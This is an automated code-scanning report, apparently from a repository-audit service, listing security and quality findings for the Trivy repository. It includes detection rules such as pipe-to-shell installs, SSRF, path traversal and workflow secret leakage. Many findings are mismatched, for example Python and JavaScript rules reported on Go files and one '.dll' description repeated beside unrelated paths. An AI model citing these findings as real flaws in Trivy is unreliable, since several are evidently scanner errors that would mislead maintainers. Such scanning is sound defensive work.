https://github.com/aquasecurity/trivy ·
lang: go ·
LOC: ·
source: user_submitted
| Rule | Severity | Count |
|---|---|---|
MINED108 self.attribute used but never assigned in __init__ |
high | 25 |
AIC003 Duplicated implementation block across source files |
low | 19 |
DKR001 Docker final stage has no non-root USER |
medium | 11 |
MINED134 [MINED134] Binary file `bin/ref/ScriptoriaCommonDefs.dll` c… |
high | 9 |
MINED118 Dockerfile FROM not pinned by sha256 digest |
high | 7 |
DKR002 Dockerfile base image has no explicit tag |
medium | 5 |
ERR003 [ERR003] Ignored Error (Go): Ignoring error return values. |
medium | 4 |
MINED124 requirements.txt entry has no version pin |
medium | 4 |
AUC009 [AUC009] Sensitive function route lacks elevated authorizat… |
medium | 4 |
MINED060 Go Context No Cancel |
info | 4 |
MINED019
Ssti Jinja From String
CWE-94
pkg/iac/scanners/ansible/parser/template.go:58
· conf 1.00
[MINED019] Ssti Jinja From String: jinja2.Environment().from_string(user_input) — full RCE via templates.MINED116
GHA pull_request workflow leaks secrets to forks
CWE-829
.github/workflows/publish-chart.yaml:70
· conf 0.90
[MINED116] Workflow uses `secrets.ACTIONS_MULTI_WRITE_GH_APP_CLIENT_ID` on a `pull_request` trigger: This workflow triggers on `pull_request`, which checks out the FORK's code. Referencing `${ secret…MINED116
GHA pull_request workflow leaks secrets to forks
CWE-829
.github/workflows/publish-chart.yaml:71
· conf 0.90
[MINED116] Workflow uses `secrets.TRIVY_WORKFLOW_TRIGGER_APP_PRIVATE_KEY` on a `pull_request` trigger: This workflow triggers on `pull_request`, which checks out the FORK's code. Referencing `${ secr…MINED004
Weak Crypto
CWE-327
pkg/dependency/parser/java/jar/sonatype/sonatype.go:109
· conf 1.00
[MINED004] Weak Crypto: MD5/SHA1/DES/RC4 used for security context (not just checksums).MINED004
Weak Crypto
CWE-327
pkg/digest/digest.go:4
· conf 1.00
[MINED004] Weak Crypto: MD5/SHA1/DES/RC4 used for security context (not just checksums).MINED004
Weak Crypto
CWE-327
pkg/fanal/analyzer/pkg/apk/apk.go:227
· conf 1.00
[MINED004] Weak Crypto: MD5/SHA1/DES/RC4 used for security context (not just checksums).MINED016
Go Error Ignored
CWE-754
internal/gittest/server.go:67
· conf 1.00
[MINED016] Go Error Ignored: _, err := fn() with err not checked. Go anti-pattern.MINED016
Go Error Ignored
CWE-754
internal/testutil/fs.go:18
· conf 1.00
[MINED016] Go Error Ignored: _, err := fn() with err not checked. Go anti-pattern.MINED016
Go Error Ignored
CWE-754
internal/testutil/gzip.go:32
· conf 1.00
[MINED016] Go Error Ignored: _, err := fn() with err not checked. Go anti-pattern.MINED033
Go Recover Without Log
CWE-755
pkg/iac/scanners/ansible/parser/template.go:71
· conf 1.00
[MINED033] Go Recover Without Log: defer func() { recover() }() that silently swallows panic.MINED033
Go Recover Without Log
CWE-755
pkg/iac/scanners/cloudformation/parser/parser.go:88
· conf 1.00
[MINED033] Go Recover Without Log: defer func() { recover() }() that silently swallows panic.MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:116
· conf 1.00
[MINED108] `self.requires` used but never assigned in __init__: Method `requirements` of class `OpenSSLConan` reads `self.requires`, but no assignment to it exists in __init__ (and no class-level fal…MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:119
· conf 1.00
[MINED108] `self._settings_build` used but never assigned in __init__: Method `build_requirements` of class `OpenSSLConan` reads `self._settings_build`, but no assignment to it exists in __init__ (an…MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:121
· conf 1.00
[MINED108] `self.tool_requires` used but never assigned in __init__: Method `build_requirements` of class `OpenSSLConan` reads `self.tool_requires`, but no assignment to it exists in __init__ (and no…MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:122
· conf 1.00
[MINED108] `self._use_nmake` used but never assigned in __init__: Method `build_requirements` of class `OpenSSLConan` reads `self._use_nmake`, but no assignment to it exists in __init__ (and no class…MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:123
· conf 1.00
[MINED108] `self.tool_requires` used but never assigned in __init__: Method `build_requirements` of class `OpenSSLConan` reads `self.tool_requires`, but no assignment to it exists in __init__ (and no…MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:125
· conf 1.00
[MINED108] `self.win_bash` used but never assigned in __init__: Method `build_requirements` of class `OpenSSLConan` reads `self.win_bash`, but no assignment to it exists in __init__ (and no class-lev…MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:126
· conf 1.00
[MINED108] `self.conf` used but never assigned in __init__: Method `build_requirements` of class `OpenSSLConan` reads `self.conf`, but no assignment to it exists in __init__ (and no class-level fallb…MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:127
· conf 1.00
[MINED108] `self.tool_requires` used but never assigned in __init__: Method `build_requirements` of class `OpenSSLConan` reads `self.tool_requires`, but no assignment to it exists in __init__ (and no…MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:150
· conf 1.00
[MINED108] `self._is_clangcl` used but never assigned in __init__: Method `_use_nmake` of class `OpenSSLConan` reads `self._is_clangcl`, but no assignment to it exists in __init__ (and no class-level…MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:153
· conf 1.00
[MINED108] `self.conan_data` used but never assigned in __init__: Method `source` of class `OpenSSLConan` reads `self.conan_data`, but no assignment to it exists in __init__ (and no class-level fallb…MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:153
· conf 1.00
[MINED108] `self.version` used but never assigned in __init__: Method `source` of class `OpenSSLConan` reads `self.version`, but no assignment to it exists in __init__ (and no class-level fallback). …MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:154
· conf 1.00
[MINED108] `self.source_folder` used but never assigned in __init__: Method `source` of class `OpenSSLConan` reads `self.source_folder`, but no assignment to it exists in __init__ (and no class-level…MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:159
· conf 1.00
[MINED108] `self._use_nmake` used but never assigned in __init__: Method `_target` of class `OpenSSLConan` reads `self._use_nmake`, but no assignment to it exists in __init__ (and no class-level fall…MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:161
· conf 1.00
[MINED108] `self._is_mingw` used but never assigned in __init__: Method `_target` of class `OpenSSLConan` reads `self._is_mingw`, but no assignment to it exists in __init__ (and no class-level fallba…MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:327
· conf 1.00
[MINED108] `self._targets` used but never assigned in __init__: Method `_ancestor_target` of class `OpenSSLConan` reads `self._targets`, but no assignment to it exists in __init__ (and no class-level…MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:339
· conf 1.00
[MINED108] `self.package_folder` used but never assigned in __init__: Method `_get_default_openssl_dir` of class `OpenSSLConan` reads `self.package_folder`, but no assignment to it exists in __init__…MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:343
· conf 1.00
[MINED108] `self._get_default_openssl_dir` used but never assigned in __init__: Method `_configure_args` of class `OpenSSLConan` reads `self._get_default_openssl_dir`, but no assignment to it exists …MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:344
· conf 1.00
[MINED108] `self.win_bash` used but never assigned in __init__: Method `_configure_args` of class `OpenSSLConan` reads `self.win_bash`, but no assignment to it exists in __init__ (and no class-level …MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:346
· conf 1.00
[MINED108] `self._target` used but never assigned in __init__: Method `_configure_args` of class `OpenSSLConan` reads `self._target`, but no assignment to it exists in __init__ (and no class-level fa…MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:353
· conf 1.00
[MINED108] `self._perl` used but never assigned in __init__: Method `_configure_args` of class `OpenSSLConan` reads `self._perl`, but no assignment to it exists in __init__ (and no class-level fallba…MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:377
· conf 1.00
[MINED108] `self.dependencies` used but never assigned in __init__: Method `_configure_args` of class `OpenSSLConan` reads `self.dependencies`, but no assignment to it exists in __init__ (and no clas…MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:384
· conf 1.00
[MINED108] `self._settings_build` used but never assigned in __init__: Method `_configure_args` of class `OpenSSLConan` reads `self._settings_build`, but no assignment to it exists in __init__ (and n…MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:389
· conf 1.00
[MINED108] `self.dependencies` used but never assigned in __init__: Method `_configure_args` of class `OpenSSLConan` reads `self.dependencies`, but no assignment to it exists in __init__ (and no clas…MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:401
· conf 1.00
[MINED108] `self.output` used but never assigned in __init__: Method `_configure_args` of class `OpenSSLConan` reads `self.output`, but no assignment to it exists in __init__ (and no class-level fall…MINED108
self.attribute used but never assigned in __init__
CWE-476
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:408
· conf 1.00
[MINED108] `self._perl` used but never assigned in __init__: Method `generate` of class `OpenSSLConan` reads `self._perl`, but no assignment to it exists in __init__ (and no class-level fallback). Th…MINED118
Dockerfile FROM not pinned by sha256 digest
CWE-829
Dockerfile:1
· conf 0.90
[MINED118] Dockerfile FROM `alpine:3.23.4` not pinned by digest: `FROM alpine:3.23.4` resolves the tag at build time. The registry CAN re-push a different image for the same tag, so every build is po…MINED118
Dockerfile FROM not pinned by sha256 digest
CWE-829
Dockerfile.canary:1
· conf 0.90
[MINED118] Dockerfile FROM `alpine:3.23.4` not pinned by digest: `FROM alpine:3.23.4` resolves the tag at build time. The registry CAN re-push a different image for the same tag, so every build is po…MINED118
Dockerfile FROM not pinned by sha256 digest
CWE-829
integration/testdata/fixtures/repo/custom-policy/Dockerfile:1
· conf 0.90
[MINED118] Dockerfile FROM `alpine:3.13` not pinned by digest: `FROM alpine:3.13` resolves the tag at build time. The registry CAN re-push a different image for the same tag, so every build is potent…MINED118
Dockerfile FROM not pinned by sha256 digest
CWE-829
integration/testdata/fixtures/repo/dockerfile/Dockerfile:1
· conf 0.90
[MINED118] Dockerfile FROM `alpine:3.13` not pinned by digest: `FROM alpine:3.13` resolves the tag at build time. The registry CAN re-push a different image for the same tag, so every build is potent…MINED118
Dockerfile FROM not pinned by sha256 digest
CWE-829
pkg/dependency/parser/java/jar/testdata/testimage/gradle/Dockerfile:1
· conf 0.90
[MINED118] Dockerfile FROM `gradle:6.8.1-jdk` not pinned by digest: `FROM gradle:6.8.1-jdk` resolves the tag at build time. The registry CAN re-push a different image for the same tag, so every build…MINED118
Dockerfile FROM not pinned by sha256 digest
CWE-829
pkg/dependency/parser/java/jar/testdata/testimage/maven/Dockerfile:1
· conf 0.90
[MINED118] Dockerfile FROM `maven:3.6.3-jdk-11` not pinned by digest: `FROM maven:3.6.3-jdk-11` resolves the tag at build time. The registry CAN re-push a different image for the same tag, so every b…MINED118
Dockerfile FROM not pinned by sha256 digest
CWE-829
pkg/fanal/analyzer/buildinfo/testdata/dockerfile/Dockerfile.sad:1
· conf 0.90
[MINED118] Dockerfile FROM `sha256:4224eead35ea350b4b9d4ac67550e92efb9a50d3855cb3381469fe4c7e3f2053` not pinned by digest: `FROM sha256:4224eead35ea350b4b9d4ac67550e92efb9a50d3855cb3381469fe4c7e3f205…MINED128
go.mod replace directive points to local path or unrelated fork
CWE-829
pkg/dependency/parser/golang/mod/testdata/replaced-with-local-path-and-version/go.mod:11
· conf 0.90
[MINED128] go.mod replaces `golang.org/x/xerrors` — points to a LOCAL path: `replace golang.org/x/xerrors => ./xerrors` overrides the canonical dependency with a different source (points to a LOCAL p…MINED128
go.mod replace directive points to local path or unrelated fork
CWE-829
pkg/dependency/parser/golang/mod/testdata/replaced-with-local-path-and-version-mismatch/go.mod:11
· conf 0.90
[MINED128] go.mod replaces `golang.org/x/xerrors` — points to a LOCAL path: `replace golang.org/x/xerrors => ./xerrors` overrides the canonical dependency with a different source (points to a LOCAL p…MINED128
go.mod replace directive points to local path or unrelated fork
CWE-829
pkg/dependency/parser/golang/mod/testdata/replaced-with-local-path/go.mod:11
· conf 0.90
[MINED128] go.mod replaces `golang.org/x/xerrors` — points to a LOCAL path: `replace golang.org/x/xerrors => ./xerrors` overrides the canonical dependency with a different source (points to a LOCAL p…MINED134
[MINED134] Binary file `bin/ref/ScriptoriaCommonDefs.dll` committed in source repo: `bin/ref/ScriptoriaCommonDefs.dll` is a .dll binary (29,208 bytes) committed to a repo that otherwise has 1643 source files. Trojan binaries inside otherwise-normal source repos are a known supply-chain attack: a compromised dependency or PR slips in a binary that gets executed by build scripts.
pkg/dependency/parser/golang/binary/testdata/test.exe:1
· conf 0.90
[MINED134] Binary file `pkg/dependency/parser/golang/binary/testdata/test.exe` committed in source repo: `pkg/dependency/parser/golang/binary/testdata/test.exe` is a .exe binary (2,708,480 bytes) com…MINED134
[MINED134] Binary file `bin/ref/ScriptoriaCommonDefs.dll` committed in source repo: `bin/ref/ScriptoriaCommonDefs.dll` is a .dll binary (29,208 bytes) committed to a repo that otherwise has 1643 source files. Trojan binaries inside otherwise-normal source repos are a known supply-chain attack: a compromised dependency or PR slips in a binary that gets executed by build scripts.
pkg/dependency/parser/java/jar/testdata/hadoop-shaded-guava-1.1.0-SNAPSHOT.jar:1
· conf 0.90
[MINED134] Binary file `pkg/dependency/parser/java/jar/testdata/hadoop-shaded-guava-1.1.0-SNAPSHOT.jar` committed in source repo: `pkg/dependency/parser/java/jar/testdata/hadoop-shaded-guava-1.1.0-SN…MINED134
[MINED134] Binary file `bin/ref/ScriptoriaCommonDefs.dll` committed in source repo: `bin/ref/ScriptoriaCommonDefs.dll` is a .dll binary (29,208 bytes) committed to a repo that otherwise has 1643 source files. Trojan binaries inside otherwise-normal source repos are a known supply-chain attack: a compromised dependency or PR slips in a binary that gets executed by build scripts.
pkg/dependency/parser/java/jar/testdata/heuristic-1.0.0-SNAPSHOT.jar:1
· conf 0.90
[MINED134] Binary file `pkg/dependency/parser/java/jar/testdata/heuristic-1.0.0-SNAPSHOT.jar` committed in source repo: `pkg/dependency/parser/java/jar/testdata/heuristic-1.0.0-SNAPSHOT.jar` is a .ja…MINED134
[MINED134] Binary file `bin/ref/ScriptoriaCommonDefs.dll` committed in source repo: `bin/ref/ScriptoriaCommonDefs.dll` is a .dll binary (29,208 bytes) committed to a repo that otherwise has 1643 source files. Trojan binaries inside otherwise-normal source repos are a known supply-chain attack: a compromised dependency or PR slips in a binary that gets executed by build scripts.
pkg/dependency/parser/java/jar/testdata/io.quarkus.gizmo.gizmo-1.1.jar:1
· conf 0.90
[MINED134] Binary file `pkg/dependency/parser/java/jar/testdata/io.quarkus.gizmo.gizmo-1.1.jar` committed in source repo: `pkg/dependency/parser/java/jar/testdata/io.quarkus.gizmo.gizmo-1.1.jar` is a…MINED134
[MINED134] Binary file `bin/ref/ScriptoriaCommonDefs.dll` committed in source repo: `bin/ref/ScriptoriaCommonDefs.dll` is a .dll binary (29,208 bytes) committed to a repo that otherwise has 1643 source files. Trojan binaries inside otherwise-normal source repos are a known supply-chain attack: a compromised dependency or PR slips in a binary that gets executed by build scripts.
pkg/dependency/parser/java/jar/testdata/nested.jar:1
· conf 0.90
[MINED134] Binary file `pkg/dependency/parser/java/jar/testdata/nested.jar` committed in source repo: `pkg/dependency/parser/java/jar/testdata/nested.jar` is a .jar binary (1,483 bytes) committed to …MINED134
[MINED134] Binary file `bin/ref/ScriptoriaCommonDefs.dll` committed in source repo: `bin/ref/ScriptoriaCommonDefs.dll` is a .dll binary (29,208 bytes) committed to a repo that otherwise has 1643 source files. Trojan binaries inside otherwise-normal source repos are a known supply-chain attack: a compromised dependency or PR slips in a binary that gets executed by build scripts.
pkg/dependency/parser/java/jar/testdata/test.jar:1
· conf 0.90
[MINED134] Binary file `pkg/dependency/parser/java/jar/testdata/test.jar` committed in source repo: `pkg/dependency/parser/java/jar/testdata/test.jar` is a .jar binary (1,105 bytes) committed to a re…MINED134
[MINED134] Binary file `bin/ref/ScriptoriaCommonDefs.dll` committed in source repo: `bin/ref/ScriptoriaCommonDefs.dll` is a .dll binary (29,208 bytes) committed to a repo that otherwise has 1643 source files. Trojan binaries inside otherwise-normal source repos are a known supply-chain attack: a compromised dependency or PR slips in a binary that gets executed by build scripts.
pkg/dependency/parser/rust/binary/testdata/test.exe:1
· conf 0.90
[MINED134] Binary file `pkg/dependency/parser/rust/binary/testdata/test.exe` committed in source repo: `pkg/dependency/parser/rust/binary/testdata/test.exe` is a .exe binary (1,394,632 bytes) committ…MINED134
[MINED134] Binary file `bin/ref/ScriptoriaCommonDefs.dll` committed in source repo: `bin/ref/ScriptoriaCommonDefs.dll` is a .dll binary (29,208 bytes) committed to a repo that otherwise has 1643 source files. Trojan binaries inside otherwise-normal source repos are a known supply-chain attack: a compromised dependency or PR slips in a binary that gets executed by build scripts.
pkg/fanal/analyzer/language/java/jar/testdata/test.jar:1
· conf 0.90
[MINED134] Binary file `pkg/fanal/analyzer/language/java/jar/testdata/test.jar` committed in source repo: `pkg/fanal/analyzer/language/java/jar/testdata/test.jar` is a .jar binary (277,275 bytes) com…MINED134
[MINED134] Binary file `bin/ref/ScriptoriaCommonDefs.dll` committed in source repo: `bin/ref/ScriptoriaCommonDefs.dll` is a .dll binary (29,208 bytes) committed to a repo that otherwise has 1643 source files. Trojan binaries inside otherwise-normal source repos are a known supply-chain attack: a compromised dependency or PR slips in a binary that gets executed by build scripts.
pkg/fanal/analyzer/testdata/post-apps/jar/jackson-annotations-2.15.0-rc2.jar:1
· conf 0.90
[MINED134] Binary file `pkg/fanal/analyzer/testdata/post-apps/jar/jackson-annotations-2.15.0-rc2.jar` committed in source repo: `pkg/fanal/analyzer/testdata/post-apps/jar/jackson-annotations-2.15.0-r…SEC029
Server-Side Request Forgery (SSRF) — outbound HTTP from user input
pkg/cache/redis.go:92
· conf 1.00
[SEC029] Server-Side Request Forgery (SSRF) — outbound HTTP from user input: Outbound HTTP request to a user-controlled URL without allowlist validation. Attackers can probe internal services (169.25…SEC029
Server-Side Request Forgery (SSRF) — outbound HTTP from user input
pkg/commands/run.go:25
· conf 1.00
[SEC029] Server-Side Request Forgery (SSRF) — outbound HTTP from user input: Outbound HTTP request to a user-controlled URL without allowlist validation. Attackers can probe internal services (169.25…SEC029
Server-Side Request Forgery (SSRF) — outbound HTTP from user input
pkg/dependency/parser/golang/mod/parse.go:47
· conf 1.00
[SEC029] Server-Side Request Forgery (SSRF) — outbound HTTP from user input: Outbound HTTP request to a user-controlled URL without allowlist validation. Attackers can probe internal services (169.25…SEC035
Unbounded Resource Allocation — DoS risk
pkg/fanal/analyzer/secret/secret.go:98
· conf 1.00
[SEC035] Unbounded Resource Allocation — DoS risk: Allocating resources (buffers, recursion stack, large ranges) based on user input without an upper bound. Attackers send `size=10000000` to exhaust …SEC069
Dockerfile: no USER directive (runs as root)
pkg/fanal/analyzer/buildinfo/dockerfile.go:1
· conf 1.00
[SEC069] Dockerfile: no USER directive (runs as root): Container runs as root because no USER directive was set. Ported from trivy DS002 / checkov CKV_DOCKER_3 (Apache-2.0). Implement as a file-level…SEC069
Dockerfile: no USER directive (runs as root)
pkg/fanal/analyzer/config/dockerfile/docker.go:1
· conf 1.00
[SEC069] Dockerfile: no USER directive (runs as root): Container runs as root because no USER directive was set. Ported from trivy DS002 / checkov CKV_DOCKER_3 (Apache-2.0). Implement as a file-level…SEC069
Dockerfile: no USER directive (runs as root)
pkg/fanal/analyzer/imgconf/dockerfile/dockerfile.go:1
· conf 1.00
[SEC069] Dockerfile: no USER directive (runs as root): Container runs as root because no USER directive was set. Ported from trivy DS002 / checkov CKV_DOCKER_3 (Apache-2.0). Implement as a file-level…SEC093
Go: exec.Command with non-literal
pkg/plugin/plugin.go:71
· conf 1.00
[SEC093] Go: exec.Command with non-literal: exec.Command(<var>) — variable command name allows command injection. Ported from gosec G204 (Apache-2.0).SEC114
path.join / Path() on user-controlled segment without containment check
pkg/fanal/analyzer/language/java/pom/pom.go:27
· conf 1.00
[SEC114] path.join / Path() on user-controlled segment without containment check: filepath.Clean / path.Join on attacker-supplied segments does NOT prevent escape from the base directory. `../../../e…SEC114
path.join / Path() on user-controlled segment without containment check
pkg/fanal/analyzer/sbom/sbom.go:57
· conf 1.00
[SEC114] path.join / Path() on user-controlled segment without containment check: filepath.Clean / path.Join on attacker-supplied segments does NOT prevent escape from the base directory. `../../../e…SEC128
Async function without await — fire-and-forget Promise (AI mistake)
pkg/cache/memory.go:38
· conf 1.00
[SEC128] Async function without await — fire-and-forget Promise (AI mistake): Async call invoked without `await` returns an unhandled Promise. The outer function resolves before the inner work comple…SEC128
Async function without await — fire-and-forget Promise (AI mistake)
pkg/mapfs/file.go:99
· conf 1.00
[SEC128] Async function without await — fire-and-forget Promise (AI mistake): Async call invoked without `await` returns an unhandled Promise. The outer function resolves before the inner work comple…AGT015
Remote install command pipes network code directly to a shell
contrib/Trivy.gitlab-ci.yml:15
· conf 0.70
Remote install command pipes network code directly to a shellAGT015
Remote install command pipes network code directly to a shell
docs/guide/advanced/container/embed-in-dockerfile.md:12
· conf 0.70
Remote install command pipes network code directly to a shellAGT015
Remote install command pipes network code directly to a shell
docs/tutorials/integrations/circleci.md:19
· conf 0.70
Remote install command pipes network code directly to a shellAUC001
[AUC001] No Repobility access matrix policy found: The repository uses web/API frameworks but does not define .repobility/access.yml or equivalent authorization documentation.
[AUC001] No Repobility access matrix policy found: The repository uses web/API frameworks but does not define .repobility/access.yml or equivalent authorization documentation.AUC002
[AUC002] Low visible authorization coverage in route inventory: Only 0.0% of discovered routes show nearby authentication, authorization, middleware, or public-route evidence.
[AUC002] Low visible authorization coverage in route inventory: Only 2.7% of discovered routes show nearby authentication, authorization, middleware, or public-route evidence.AUC009
[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. Endpoint: DELETE /items/{item_id}.
pkg/iac/scanners/terraform/parser/evaluator.go:250
· conf 0.68
[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without el…AUC009
[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. Endpoint: DELETE /items/{item_id}.
pkg/x/http/trace.go:191
· conf 0.68
[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without el…AUC009
[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. Endpoint: DELETE /items/{item_id}.
rpc/cache/service.twirp.go:1169
· conf 0.68
[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without el…AUC009
[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without elevated policy evidence. Endpoint: DELETE /items/{item_id}.
rpc/cache/service.twirp.go:1180
· conf 0.68
[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without el…DKR001
Docker final stage has no non-root USER
Dockerfile:1
· conf 0.82
Docker final stage has no non-root USERDKR001
Docker final stage has no non-root USER
Dockerfile.canary:1
· conf 0.82
Docker final stage has no non-root USERDKR001
Docker final stage has no non-root USER
docs/build/Dockerfile:1
· conf 0.82
Docker final stage has no non-root USERDKR001
Docker final stage has no non-root USER
integration/testdata/fixtures/repo/dockerfile/Dockerfile:1
· conf 0.82
Docker final stage has no non-root USERDKR001
Docker final stage has no non-root USER
pkg/dependency/parser/java/jar/testdata/testimage/gradle/Dockerfile:1
· conf 0.82
Docker final stage has no non-root USERDKR001
Docker final stage has no non-root USER
pkg/dependency/parser/java/jar/testdata/testimage/maven/Dockerfile:1
· conf 0.82
Docker final stage has no non-root USERDKR001
Docker final stage has no non-root USER
pkg/fanal/analyzer/buildinfo/testdata/dockerfile/Dockerfile.sad:1
· conf 0.82
Docker final stage has no non-root USERDKR001
Docker final stage has no non-root USER
pkg/fanal/analyzer/config/testdata/src/Dockerfile:1
· conf 0.82
Docker final stage has no non-root USERDKR001
Docker final stage has no non-root USER
pkg/fanal/artifact/local/testdata/misconfig/dockerfile/multiple-failures/src/Dockerfile:3
· conf 0.82
Docker final stage has no non-root USERDKR001
Docker final stage has no non-root USER
pkg/fanal/artifact/local/testdata/misconfig/dockerfile/passed/src/Dockerfile:1
· conf 0.82
Docker final stage has no non-root USERDKR001
Docker final stage has no non-root USER
pkg/fanal/artifact/local/testdata/misconfig/dockerfile/single-failure/src/Dockerfile:1
· conf 0.82
Docker final stage has no non-root USERDKR002
Dockerfile base image has no explicit tag
pkg/fanal/analyzer/config/testdata/src/Dockerfile:1
· conf 0.90
Dockerfile base image has no explicit tagDKR002
Dockerfile base image has no explicit tag
pkg/fanal/artifact/local/testdata/misconfig/dockerfile/multiple-failures/src/Dockerfile:1
· conf 0.90
Dockerfile base image has no explicit tagDKR002
Dockerfile base image has no explicit tag
pkg/fanal/artifact/local/testdata/misconfig/dockerfile/multiple-failures/src/Dockerfile:3
· conf 0.90
Dockerfile base image has no explicit tagDKR002
Dockerfile base image has no explicit tag
pkg/fanal/artifact/local/testdata/misconfig/dockerfile/passed/src/Dockerfile:1
· conf 0.90
Dockerfile base image has no explicit tagDKR002
Dockerfile base image has no explicit tag
pkg/fanal/artifact/local/testdata/misconfig/dockerfile/single-failure/src/Dockerfile:1
· conf 0.90
Dockerfile base image has no explicit tagDKR018
Database dump or local database file is included in Docker build context
.dockerignore
· conf 0.86
Database dump or local database file is included in Docker build contextMINED124
requirements.txt entry has no version pin
CWE-1357
integration/testdata/fixtures/repo/pip/requirements.txt:5
· conf 0.90
[MINED124] requirements.txt: `MarkupSafe>2.0.0` has no version pin: Unpinned pip requirement means every fresh install may resolve a different version. Newer releases can introduce malicious code (ty…MINED124
requirements.txt entry has no version pin
CWE-1357
pkg/fanal/analyzer/language/python/pip/testdata/happy/requirements.txt:5
· conf 0.90
[MINED124] requirements.txt: `Jinja2<3.0.0` has no version pin: Unpinned pip requirement means every fresh install may resolve a different version. Newer releases can introduce malicious code (typosq…MINED124
requirements.txt entry has no version pin
CWE-1357
pkg/fanal/analyzer/language/python/pip/testdata/happy/requirements.txt:6
· conf 0.90
[MINED124] requirements.txt: `MarkupSafe>2.0.0` has no version pin: Unpinned pip requirement means every fresh install may resolve a different version. Newer releases can introduce malicious code (ty…MINED124
requirements.txt entry has no version pin
CWE-1357
pkg/fanal/analyzer/language/python/pip/testdata/happy/requirements.txt:7
· conf 0.90
[MINED124] requirements.txt: `Werkzeug` has no version pin: Unpinned pip requirement means every fresh install may resolve a different version. Newer releases can introduce malicious code (typosquats…SEC091
Go: net/http server without timeouts
pkg/rpc/server/listen.go:67
· conf 1.00
[SEC091] Go: net/http server without timeouts: HTTP server without ReadHeaderTimeout/ReadTimeout/WriteTimeout is vulnerable to Slowloris. Ported from gosec G112 + G114 (Apache-2.0).AIC003
Duplicated implementation block across source files
pkg/dependency/parser/rust/cargo/naive_pkg_parser.go:14
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
pkg/detector/ospkg/coreos/coreos.go:2
· conf 0.86
Duplicated implementation block across source filesAIC003
Duplicated implementation block across source files
pkg/detector/ospkg/minimos/minimos.go:41
· conf 0.86
